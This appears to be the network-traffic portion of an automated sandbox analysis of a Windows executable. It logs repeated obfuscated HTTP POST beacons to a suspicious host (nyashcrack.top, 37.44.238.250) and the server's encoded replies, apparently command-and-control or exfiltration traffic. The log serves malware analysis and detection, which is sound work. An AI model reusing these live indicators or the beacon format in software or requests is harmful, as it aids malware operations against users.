Timestamp | Bytes transferred | Direction | Data
Dec 9, 2024 16:00:46.745899916 CET | 342 | OUT | POST /geoGeneratorwordpresswpprivatetempDownloads.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
    Host: 306039cm.nyashcrack.top
    Content-Length: 1040
    Expect: 100-continue
    Connection: Keep-Alive
Dec 9, 2024 16:00:47.094175100 CET | 1040 | OUT | Data Raw: 5c 58 5e 54 5a 41 5c 58 5c 5c 56 57 50 50 5b 5e 5f 50 59 5d 56 5c 51 56 58 52 5d 5e 51 5e 58 51 5c 52 50 5e 55 50 52 51 42 50 56 5f 5f 53 5e 5e 50 52 5f 5c 5a 5c 5a 5e 50 53 5a 50 55 50 50 58 5d 5f 59 5a 5c 56 56 52 5b 5e 5a 59 5c 5a 59 55 52 52
    Data Ascii: \X^TZA\X\\VWPP[^_PY]V\QVXR]^Q^XQ\RP^UPRQBPV__S^^PR_\Z\Z^PSZPUPPX]_YZ\VVR[^ZY\ZYURRX_T_UBVYQR\]TVXQZXRWC^UZAU\Y[T[_PS^PZPPXCQSSAW^PVT[\[_B[UWXFZ\XSV_UQ_B]ZYY_[T\F][][\VWS_TQ]R[RZ^[_G\^P 8.69) <&*(<0Z'^5Z*1 >+*8B?.;Z?:&^#,X
Dec 9, 2024 16:00:48.015729904 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 9, 2024 16:00:48.254266024 CET | 158 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Mon, 09 Dec 2024 15:00:47 GMT
    Content-Type: text/html; charset=UTF-8
    Content-Length: 4
    Connection: keep-alive
    Data Raw: 3d 5d 5d 5a
    Data Ascii: =]]Z


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.4 | 49761 | 37.44.238.250 | 80 | 8932 | C:\Users\user\Desktop\4si9noTBNw.exe
Timestamp | Bytes transferred | Direction | Data
Dec 9, 2024 16:00:48.496217012 CET | 318 | OUT | POST /geoGeneratorwordpresswpprivatetempDownloads.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
    Host: 306039cm.nyashcrack.top
    Content-Length: 1032
    Expect: 100-continue
Dec 9, 2024 16:00:48.846326113 CET | 1032 | OUT | Data Raw: 5c 5a 5e 53 5f 43 59 5c 5c 5c 56 57 50 59 5b 5d 5f 5a 59 58 56 5c 51 5f 58 52 5d 5e 51 5e 58 51 5c 52 50 5e 55 50 52 51 42 50 56 5f 5f 53 5e 5e 50 52 5f 5c 5a 5c 5a 5e 50 53 5a 50 55 50 50 58 5d 5f 59 5a 5c 56 56 52 5b 5e 5a 59 5c 5a 59 55 52 52
    Data Ascii: \Z^S_CY\\\VWPY[]_ZYXV\Q_XR]^Q^XQ\RP^UPRQBPV__S^^PR_\Z\Z^PSZPUPPX]_YZ\VVR[^ZY\ZYURRX_T_UBVYQR\]TVXQZXRWC^UZAU\Y[T[_PS^PZPPXCQSSAW^PVT[\[_B[UWXFZ\XSV_UQ_B]ZYY_[T\F][][\VWS_TQ]R[RZ^[_G\^P#-"]!9:4]14<03;!Y>&"S4?2W(4E+.#^?:&^#,X 3
Dec 9, 2024 16:00:49.777524948 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 9, 2024 16:00:50.010581017 CET | 158 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Mon, 09 Dec 2024 15:00:48 GMT
    Content-Type: text/html; charset=UTF-8
    Content-Length: 4
    Connection: keep-alive
    Data Raw: 3d 5d 5d 5a
    Data Ascii: =]]Z


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.4 | 49767 | 37.44.238.250 | 80 | 8932 | C:\Users\user\Desktop\4si9noTBNw.exe
Timestamp | Bytes transferred | Direction | Data
Dec 9, 2024 16:00:50.264944077 CET | 342 | OUT | POST /geoGeneratorwordpresswpprivatetempDownloads.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
    Host: 306039cm.nyashcrack.top
    Content-Length: 1040
    Expect: 100-continue
    Connection: Keep-Alive
Dec 9, 2024 16:00:50.609761000 CET | 1040 | OUT | Data Raw: 59 5d 5e 50 5a 43 5c 5f 5c 5c 56 57 50 5e 5b 5c 5f 5c 59 5a 56 5c 51 58 58 52 5d 5e 51 5e 58 51 5c 52 50 5e 55 50 52 51 42 50 56 5f 5f 53 5e 5e 50 52 5f 5c 5a 5c 5a 5e 50 53 5a 50 55 50 50 58 5d 5f 59 5a 5c 56 56 52 5b 5e 5a 59 5c 5a 59 55 52 52
    Data Ascii: Y]^PZC\_\\VWP^[\_\YZV\QXXR]^Q^XQ\RP^UPRQBPV__S^^PR_\Z\Z^PSZPUPPX]_YZ\VVR[^ZY\ZYURRX_T_UBVYQR\]TVXQZXRWC^UZAU\Y[T[_PS^PZPPXCQSSAW^PVT[\[_B[UWXFZ\XSV_UQ_B]ZYY_[T\F][][\VWS_TQ]R[RZ^[_G\^P#,2"96"&?&*+?40[3;6).W /.<9<B<-8*:&^#,X
Dec 9, 2024 16:00:51.567677975 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 9, 2024 16:00:51.802381992 CET | 158 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Mon, 09 Dec 2024 15:00:50 GMT
    Content-Type: text/html; charset=UTF-8
    Content-Length: 4
    Connection: keep-alive
    Data Raw: 3d 5d 5d 5a
    Data Ascii: =]]Z


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.4 | 49773 | 37.44.238.250 | 80 | 8932 | C:\Users\user\Desktop\4si9noTBNw.exe
Timestamp | Bytes transferred | Direction | Data
Dec 9, 2024 16:00:52.044157982 CET | 342 | OUT | POST /geoGeneratorwordpresswpprivatetempDownloads.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
    Host: 306039cm.nyashcrack.top
    Content-Length: 1040
    Expect: 100-continue
    Connection: Keep-Alive
Dec 9, 2024 16:00:52.390973091 CET | 1040 | OUT | Data Raw: 5c 5d 5b 52 5f 45 59 59 5c 5c 56 57 50 58 5b 50 5f 5e 59 5b 56 5b 51 58 58 52 5d 5e 51 5e 58 51 5c 52 50 5e 55 50 52 51 42 50 56 5f 5f 53 5e 5e 50 52 5f 5c 5a 5c 5a 5e 50 53 5a 50 55 50 50 58 5d 5f 59 5a 5c 56 56 52 5b 5e 5a 59 5c 5a 59 55 52 52
    Data Ascii: \][R_EYY\\VWPX[P_^Y[V[QXXR]^Q^XQ\RP^UPRQBPV__S^^PR_\Z\Z^PSZPUPPX]_YZ\VVR[^ZY\ZYURRX_T_UBVYQR\]TVXQZXRWC^UZAU\Y[T[_PS^PZPPXCQSSAW^PVT[\[_B[UWXFZ\XSV_UQ_B]ZYY_[T\F][][\VWS_TQ]R[RZ^[_G\^P#/!._66#+&:(+B8]09*%&#?<9'<**&^#,X '


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.4 | 49774 | 37.44.238.250 | 80 | 8932 | C:\Users\user\Desktop\4si9noTBNw.exe
Timestamp | Bytes transferred | Direction | Data
Dec 9, 2024 16:00:53.187114000 CET | 342 | OUT | POST /geoGeneratorwordpresswpprivatetempDownloads.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
    Host: 306039cm.nyashcrack.top
    Content-Length: 1756
    Expect: 100-continue
    Connection: Keep-Alive
Dec 9, 2024 16:00:53.531476974 CET | 1756 | OUT | Data Raw: 5c 5a 5b 52 5f 45 5c 5b 5c 5c 56 57 50 5f 5b 5e 5f 5d 59 59 56 5a 51 59 58 52 5d 5e 51 5e 58 51 5c 52 50 5e 55 50 52 51 42 50 56 5f 5f 53 5e 5e 50 52 5f 5c 5a 5c 5a 5e 50 53 5a 50 55 50 50 58 5d 5f 59 5a 5c 56 56 52 5b 5e 5a 59 5c 5a 59 55 52 52
    Data Ascii: \Z[R_E\[\\VWP_[^_]YYVZQYXR]^Q^XQ\RP^UPRQBPV__S^^PR_\Z\Z^PSZPUPPX]_YZ\VVR[^ZY\ZYURRX_T_UBVYQR\]TVXQZXRWC^UZAU\Y[T[_PS^PZPPXCQSSAW^PVT[\[_B[UWXFZ\XSV_UQ_B]ZYY_[T\F][][\VWS_TQ]R[RZ^[_G\^P#;5!:-_ +%4R=' Z'8*%*W4<-?)3+(&^#,X ;
Dec 9, 2024 16:00:54.486439943 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 9, 2024 16:00:54.722563982 CET | 308 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Mon, 09 Dec 2024 15:00:53 GMT
    Content-Type: text/html; charset=UTF-8
    Content-Length: 152
    Connection: keep-alive
    Data Raw: 0f 15 24 57 35 40 23 5f 20 28 3f 0c 2c 3d 3d 5d 22 3f 3b 5c 3c 3d 3b 5f 32 1d 09 14 3b 59 22 1e 36 30 35 07 28 22 38 55 3c 21 2c 52 35 35 21 5a 06 1e 26 02 27 04 30 57 39 31 30 5b 3c 31 0f 05 20 2e 2c 03 33 33 37 0e 25 59 33 06 30 2f 33 52 38 55 3a 57 3e 10 23 42 3f 3f 2b 5b 30 2f 2b 53 0e 1f 20 1f 29 0f 3d 57 29 3e 23 54 35 3f 0e 1f 25 2d 2e 51 32 21 3c 50 3c 04 13 55 3f 0d 15 1c 22 2d 30 52 26 3f 3a 00 3e 3f 37 53 32 09 20 5e 22 0f 2f 52 00 31 5c 4d
    Data Ascii: $W5@#_ (?,==]"?;\<=;_2;Y"605("8U<!,R55!Z&'0W910[<1 .,337%Y30/3R8U:W>#B??+[0/+S )=W)>#T5?%-.Q2!<P<U?"-0R&?:>?7S2 ^"/R1\M


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.4 | 49776 | 37.44.238.250 | 80 | 8932 | C:\Users\user\Desktop\4si9noTBNw.exe
Timestamp | Bytes transferred | Direction | Data
Dec 9, 2024 16:00:53.319574118 CET | 342 | OUT | POST /geoGeneratorwordpresswpprivatetempDownloads.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
    Host: 306039cm.nyashcrack.top
    Content-Length: 1040
    Expect: 100-continue
    Connection: Keep-Alive
Dec 9, 2024 16:00:53.672122002 CET | 1040 | OUT | Data Raw: 59 5d 5b 53 5a 40 59 5b 5c 5c 56 57 50 5a 5b 58 5f 5d 59 59 56 5b 51 5c 58 52 5d 5e 51 5e 58 51 5c 52 50 5e 55 50 52 51 42 50 56 5f 5f 53 5e 5e 50 52 5f 5c 5a 5c 5a 5e 50 53 5a 50 55 50 50 58 5d 5f 59 5a 5c 56 56 52 5b 5e 5a 59 5c 5a 59 55 52 52
    Data Ascii: Y][SZ@Y[\\VWPZ[X_]YYV[Q\XR]^Q^XQ\RP^UPRQBPV__S^^PR_\Z\Z^PSZPUPPX]_YZ\VVR[^ZY\ZYURRX_T_UBVYQR\]TVXQZXRWC^UZAU\Y[T[_PS^PZPPXCQSSAW^PVT[\[_B[UWXFZ\XSV_UQ_B]ZYY_[T\F][][\VWS_TQ]R[RZ^[_G\^P ,2Z".75;%:??4$X$;>>.7<*P<;<[ (*&^#,X /
Dec 9, 2024 16:00:54.591447115 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 9, 2024 16:00:54.826522112 CET | 158 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Mon, 09 Dec 2024 15:00:53 GMT
    Content-Type: text/html; charset=UTF-8
    Content-Length: 4
    Connection: keep-alive
    Data Raw: 3d 5d 5d 5a
    Data Ascii: =]]Z


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.4 | 49781 | 37.44.238.250 | 80 | 8932 | C:\Users\user\Desktop\4si9noTBNw.exe
Timestamp | Bytes transferred | Direction | Data
Dec 9, 2024 16:00:55.074157000 CET | 318 | OUT | POST /geoGeneratorwordpresswpprivatetempDownloads.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
    Host: 306039cm.nyashcrack.top
    Content-Length: 1040
    Expect: 100-continue
Dec 9, 2024 16:00:55.422173977 CET | 1040 | OUT | Data Raw: 5c 59 5b 51 5f 40 59 5a 5c 5c 56 57 50 50 5b 5a 5f 5c 59 5f 56 5d 51 5c 58 52 5d 5e 51 5e 58 51 5c 52 50 5e 55 50 52 51 42 50 56 5f 5f 53 5e 5e 50 52 5f 5c 5a 5c 5a 5e 50 53 5a 50 55 50 50 58 5d 5f 59 5a 5c 56 56 52 5b 5e 5a 59 5c 5a 59 55 52 52
    Data Ascii: \Y[Q_@YZ\\VWPP[Z_\Y_V]Q\XR]^Q^XQ\RP^UPRQBPV__S^^PR_\Z\Z^PSZPUPPX]_YZ\VVR[^ZY\ZYURRX_T_UBVYQR\]TVXQZXRWC^UZAU\Y[T[_PS^PZPPXCQSSAW^PVT[\[_B[UWXFZ\XSV_UQ_B]ZYY_[T\F][][\VWS_TQ]R[RZ^[_G\^P ,2!!\=45(Z1_7<4&8Z*C2Q"/"U+9(B<0<:&^#,X
Dec 9, 2024 16:00:56.392175913 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 9, 2024 16:00:56.626420021 CET | 158 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Mon, 09 Dec 2024 15:00:55 GMT
    Content-Type: text/html; charset=UTF-8
    Content-Length: 4
    Connection: keep-alive
    Data Raw: 3d 5d 5d 5a
    Data Ascii: =]]Z


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.4 | 49787 | 37.44.238.250 | 80 | 8932 | C:\Users\user\Desktop\4si9noTBNw.exe
Timestamp | Bytes transferred | Direction | Data
Dec 9, 2024 16:00:56.949455976 CET | 342 | OUT | POST /geoGeneratorwordpresswpprivatetempDownloads.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
    Host: 306039cm.nyashcrack.top
    Content-Length: 1040
    Expect: 100-continue
    Connection: Keep-Alive
Dec 9, 2024 16:00:57.297116041 CET | 1040 | OUT | Data Raw: 59 5d 5e 50 5a 43 59 5e 5c 5c 56 57 50 51 5b 5e 5f 51 59 59 56 58 51 5f 58 52 5d 5e 51 5e 58 51 5c 52 50 5e 55 50 52 51 42 50 56 5f 5f 53 5e 5e 50 52 5f 5c 5a 5c 5a 5e 50 53 5a 50 55 50 50 58 5d 5f 59 5a 5c 56 56 52 5b 5e 5a 59 5c 5a 59 55 52 52
    Data Ascii: Y]^PZCY^\\VWPQ[^_QYYVXQ_XR]^Q^XQ\RP^UPRQBPV__S^^PR_\Z\Z^PSZPUPPX]_YZ\VVR[^ZY\ZYURRX_T_UBVYQR\]TVXQZXRWC^UZAU\Y[T[_PS^PZPPXCQSSAW^PVT[\[_B[UWXFZ\XSV_UQ_B]ZYY_[T\F][][\VWS_TQ]R[RZ^[_G\^P A;25*#$29,W('''8!>&."<-<7<[3(*&^#,X
Dec 9, 2024 16:00:58.219134092 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 9, 2024 16:00:58.454638958 CET | 158 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Mon, 09 Dec 2024 15:00:57 GMT
    Content-Type: text/html; charset=UTF-8
    Content-Length: 4
    Connection: keep-alive
    Data Raw: 3d 5d 5d 5a
    Data Ascii: =]]Z


Session ID: 20 | Source IP: 192.168.2.4 | Source Port: 49793 | Destination IP: 37.44.238.250 | Destination Port: 80 | PID: 8932 | Process: C:\Users\user\Desktop\4si9noTBNw.exe
Timestamp | Bytes transferred | Direction | Data
Dec 9, 2024 16:00:58.748187065 CET | 342 | OUT | POST /geoGeneratorwordpresswpprivatetempDownloads.php HTTP/1.1
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
  Host: 306039cm.nyashcrack.top
  Content-Length: 1040
  Expect: 100-continue
  Connection: Keep-Alive
Dec 9, 2024 16:00:59.094018936 CET | 1040 | OUT | Data Raw: 59 58 5b 53 5a 40 5c 59 5c 5c 56 57 50 5f 5b 59 5f 50 59 55 56 53 51 5d 58 52 5d 5e 51 5e 58 51 5c 52 50 5e 55 50 52 51 42 50 56 5f 5f 53 5e 5e 50 52 5f 5c 5a 5c 5a 5e 50 53 5a 50 55 50 50 58 5d 5f 59 5a 5c 56 56 52 5b 5e 5a 59 5c 5a 59 55 52 52
  Data Ascii: YX[SZ@\Y\\VWP_[Y_PYUVSQ]XR]^Q^XQ\RP^UPRQBPV__S^^PR_\Z\Z^PSZPUPPX]_YZ\VVR[^ZY\ZYURRX_T_UBVYQR\]TVXQZXRWC^UZAU\Y[T[_PS^PZPPXCQSSAW^PVT[\[_B[UWXFZ\XSV_UQ_B]ZYY_[T\F][][\VWS_TQ]R[RZ^[_G\^P /T*^!!46;%9W<?'^>=&%",5+?0+*&^#,X ;


Session ID: 21 | Source IP: 192.168.2.4 | Source Port: 49794 | Destination IP: 37.44.238.250 | Destination Port: 80 | PID: 8932 | Process: C:\Users\user\Desktop\4si9noTBNw.exe
Timestamp | Bytes transferred | Direction | Data
Dec 9, 2024 16:00:59.870028019 CET | 342 | OUT | POST /geoGeneratorwordpresswpprivatetempDownloads.php HTTP/1.1
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
  Host: 306039cm.nyashcrack.top
  Content-Length: 1756
  Expect: 100-continue
  Connection: Keep-Alive
Dec 9, 2024 16:01:00.219016075 CET | 1756 | OUT | Data Raw: 59 55 5e 54 5a 40 5c 59 5c 5c 56 57 50 58 5b 51 5f 5b 59 5f 56 59 51 5b 58 52 5d 5e 51 5e 58 51 5c 52 50 5e 55 50 52 51 42 50 56 5f 5f 53 5e 5e 50 52 5f 5c 5a 5c 5a 5e 50 53 5a 50 55 50 50 58 5d 5f 59 5a 5c 56 56 52 5b 5e 5a 59 5c 5a 59 55 52 52
  Data Ascii: YU^TZ@\Y\\VWPX[Q_[Y_VYQ[XR]^Q^XQ\RP^UPRQBPV__S^^PR_\Z\Z^PSZPUPPX]_YZ\VVR[^ZY\ZYURRX_T_UBVYQR\]TVXQZXRWC^UZAU\Y[T[_PS^PZPPXCQSSAW^PVT[\[_B[UWXFZ\XSV_UQ_B]ZYY_[T\F][][\VWS_TQ]R[RZ^[_G\^P D/2*Z5:-72)(?$Y';)[=&17.V+90B?/]?&^#,X '
Dec 9, 2024 16:01:01.136001110 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 9, 2024 16:02:01.246844053 CET | 717 | IN | HTTP/1.1 504 Gateway Time-out
  Server: nginx
  Date: Mon, 09 Dec 2024 15:02:00 GMT
  Content-Type: text/html
  Content-Length: 562
  Connection: keep-alive
  Data Ascii: <html><head><title>504 Gateway Time-out</title></head><body><center><h1>504 Gateway Time-out</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID: 22 | Source IP: 192.168.2.4 | Source Port: 49796 | Destination IP: 37.44.238.250 | Destination Port: 80 | PID: 8932 | Process: C:\Users\user\Desktop\4si9noTBNw.exe
Timestamp | Bytes transferred | Direction | Data
Dec 9, 2024 16:01:00.102823019 CET | 342 | OUT | POST /geoGeneratorwordpresswpprivatetempDownloads.php HTTP/1.1
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
  Host: 306039cm.nyashcrack.top
  Content-Length: 1040
  Expect: 100-continue
  Connection: Keep-Alive
Dec 9, 2024 16:01:00.453352928 CET | 1040 | OUT | Data Raw: 5c 58 5e 5f 5a 41 5c 5e 5c 5c 56 57 50 5f 5b 5a 5f 5f 59 5c 56 53 51 57 58 52 5d 5e 51 5e 58 51 5c 52 50 5e 55 50 52 51 42 50 56 5f 5f 53 5e 5e 50 52 5f 5c 5a 5c 5a 5e 50 53 5a 50 55 50 50 58 5d 5f 59 5a 5c 56 56 52 5b 5e 5a 59 5c 5a 59 55 52 52
  Data Ascii: \X^_ZA\^\\VWP_[Z__Y\VSQWXR]^Q^XQ\RP^UPRQBPV__S^^PR_\Z\Z^PSZPUPPX]_YZ\VVR[^ZY\ZYURRX_T_UBVYQR\]TVXQZXRWC^UZAU\Y[T[_PS^PZPPXCQSSAW^PVT[\[_B[UWXFZ\XSV_UQ_B]ZYY_[T\F][][\VWS_TQ]R[RZ^[_G\^P#8)"6# _%=$(0=)7<6W+9+#^?*&^#,X ;
Dec 9, 2024 16:01:01.373186111 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 9, 2024 16:02:01.391387939 CET | 717 | IN | HTTP/1.1 504 Gateway Time-out
  Server: nginx
  Date: Mon, 09 Dec 2024 15:02:00 GMT
  Content-Type: text/html
  Content-Length: 562
  Connection: keep-alive
  Data Ascii: <html><head><title>504 Gateway Time-out</title></head><body><center><h1>504 Gateway Time-out</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID: 23 | Source IP: 192.168.2.4 | Source Port: 49931 | Destination IP: 37.44.238.250 | Destination Port: 80
Timestamp | Bytes transferred | Direction | Data
Dec 9, 2024 16:02:01.662130117 CET | 318 | OUT | POST /geoGeneratorwordpresswpprivatetempDownloads.php HTTP/1.1
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
  Host: 306039cm.nyashcrack.top
  Content-Length: 1040
  Expect: 100-continue
Dec 9, 2024 16:02:02.015983105 CET | 1040 | OUT | Data Raw: 59 55 5e 53 5a 41 59 52 5c 5c 56 57 50 58 5b 5a 5f 5d 59 5f 56 52 51 5c 58 52 5d 5e 51 5e 58 51 5c 52 50 5e 55 50 52 51 42 50 56 5f 5f 53 5e 5e 50 52 5f 5c 5a 5c 5a 5e 50 53 5a 50 55 50 50 58 5d 5f 59 5a 5c 56 56 52 5b 5e 5a 59 5c 5a 59 55 52 52
  Data Ascii: YU^SZAYR\\VWPX[Z_]Y_VRQ\XR]^Q^XQ\RP^UPRQBPV__S^^PR_\Z\Z^PSZPUPPX]_YZ\VVR[^ZY\ZYURRX_T_UBVYQR\]TVXQZXRWC^UZAU\Y[T[_PS^PZPPXCQSSAW^PVT[\[_B[UWXFZ\XSV_UQ_B]ZYY_[T\F][][\VWS_TQ]R[RZ^[_G\^P @/"%5*"754[%$T+B4\3(=X(59 /((((&^#,X '
Dec 9, 2024 16:02:02.939073086 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 9, 2024 16:02:03.182363987 CET | 158 | IN | HTTP/1.1 200 OK
  Server: nginx
  Date: Mon, 09 Dec 2024 15:02:02 GMT
  Content-Type: text/html; charset=UTF-8
  Content-Length: 4
  Connection: keep-alive
  Data Raw: 3d 5d 5d 5a
  Data Ascii: =]]Z


Session ID: 24 | Source IP: 192.168.2.4 | Source Port: 49937 | Destination IP: 37.44.238.250 | Destination Port: 80
Timestamp | Bytes transferred | Direction | Data
Dec 9, 2024 16:02:03.433032036 CET | 342 | OUT | POST /geoGeneratorwordpresswpprivatetempDownloads.php HTTP/1.1
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
  Host: 306039cm.nyashcrack.top
  Content-Length: 1040
  Expect: 100-continue
  Connection: Keep-Alive
Dec 9, 2024 16:02:03.781613111 CET | 1040 | OUT | Data Raw: 59 5d 5b 55 5f 41 59 5b 5c 5c 56 57 50 5a 5b 59 5f 5b 59 5d 56 5a 51 57 58 52 5d 5e 51 5e 58 51 5c 52 50 5e 55 50 52 51 42 50 56 5f 5f 53 5e 5e 50 52 5f 5c 5a 5c 5a 5e 50 53 5a 50 55 50 50 58 5d 5f 59 5a 5c 56 56 52 5b 5e 5a 59 5c 5a 59 55 52 52
  Data Ascii: Y][U_AY[\\VWPZ[Y_[Y]VZQWXR]^Q^XQ\RP^UPRQBPV__S^^PR_\Z\Z^PSZPUPPX]_YZ\VVR[^ZY\ZYURRX_T_UBVYQR\]TVXQZXRWC^UZAU\Y[T[_PS^PZPPXCQSSAW^PVT[\[_B[UWXFZ\XSV_UQ_B]ZYY_[T\F][][\VWS_TQ]R[RZ^[_G\^P /T1 :*#;29V?43;!(%:W4?+$A(>/_*:&^#,X /
Dec 9, 2024 16:02:04.715818882 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 9, 2024 16:02:04.941869974 CET | 158 | IN | HTTP/1.1 200 OK
  Server: nginx
  Date: Mon, 09 Dec 2024 15:02:03 GMT
  Content-Type: text/html; charset=UTF-8
  Content-Length: 4
  Connection: keep-alive
  Data Raw: 3d 5d 5d 5a
  Data Ascii: =]]Z


Session ID: 25 | Source IP: 192.168.2.4 | Source Port: 49941 | Destination IP: 37.44.238.250 | Destination Port: 80
Timestamp | Bytes transferred | Direction | Data
Dec 9, 2024 16:02:05.181252956 CET | 342 | OUT | POST /geoGeneratorwordpresswpprivatetempDownloads.php HTTP/1.1
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
  Host: 306039cm.nyashcrack.top
  Content-Length: 1040
  Expect: 100-continue
  Connection: Keep-Alive
Dec 9, 2024 16:02:05.532155037 CET | 1040 | OUT | Data Raw: 5c 58 5e 5e 5f 45 59 5d 5c 5c 56 57 50 51 5b 5e 5f 5b 59 59 56 5c 51 5a 58 52 5d 5e 51 5e 58 51 5c 52 50 5e 55 50 52 51 42 50 56 5f 5f 53 5e 5e 50 52 5f 5c 5a 5c 5a 5e 50 53 5a 50 55 50 50 58 5d 5f 59 5a 5c 56 56 52 5b 5e 5a 59 5c 5a 59 55 52 52
  Data Ascii: \X^^_EY]\\VWPQ[^_[YYV\QZXR]^Q^XQ\RP^UPRQBPV__S^^PR_\Z\Z^PSZPUPPX]_YZ\VVR[^ZY\ZYURRX_T_UBVYQR\]TVXQZXRWC^UZAU\Y[T[_PS^PZPPXCQSSAW^PVT[\[_B[UWXFZ\XSV_UQ_B]ZYY_[T\F][][\VWS_TQ]R[RZ^[_G\^P#/6!\)Y $1++?'(!\)%) /+)0B>=<?:&^#,X


Session ID: 26 | Source IP: 192.168.2.4 | Source Port: 49945 | Destination IP: 37.44.238.250 | Destination Port: 80
Timestamp | Bytes transferred | Direction | Data
Dec 9, 2024 16:02:06.388338089 CET | 342 | OUT | POST /geoGeneratorwordpresswpprivatetempDownloads.php HTTP/1.1
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
  Host: 306039cm.nyashcrack.top
  Content-Length: 1732
  Expect: 100-continue
  Connection: Keep-Alive
Dec 9, 2024 16:02:06.734760046 CET | 1732 | OUT | Data Raw: 5c 58 5b 53 5f 46 5c 5c 5c 5c 56 57 50 50 5b 51 5f 5c 59 59 56 52 51 57 58 52 5d 5e 51 5e 58 51 5c 52 50 5e 55 50 52 51 42 50 56 5f 5f 53 5e 5e 50 52 5f 5c 5a 5c 5a 5e 50 53 5a 50 55 50 50 58 5d 5f 59 5a 5c 56 56 52 5b 5e 5a 59 5c 5a 59 55 52 52
  Data Ascii: \X[S_F\\\\VWPP[Q_\YYVRQWXR]^Q^XQ\RP^UPRQBPV__S^^PR_\Z\Z^PSZPUPPX]_YZ\VVR[^ZY\ZYURRX_T_UBVYQR\]TVXQZXRWC^UZAU\Y[T[_PS^PZPPXCQSSAW^PVT[\[_B[UWXFZ\XSV_UQ_B]ZYY_[T\F][][\VWS_TQ]R[RZ^[_G\^P#829!:\#6#&(W+(X')6.",2W?)?$**&^#,X
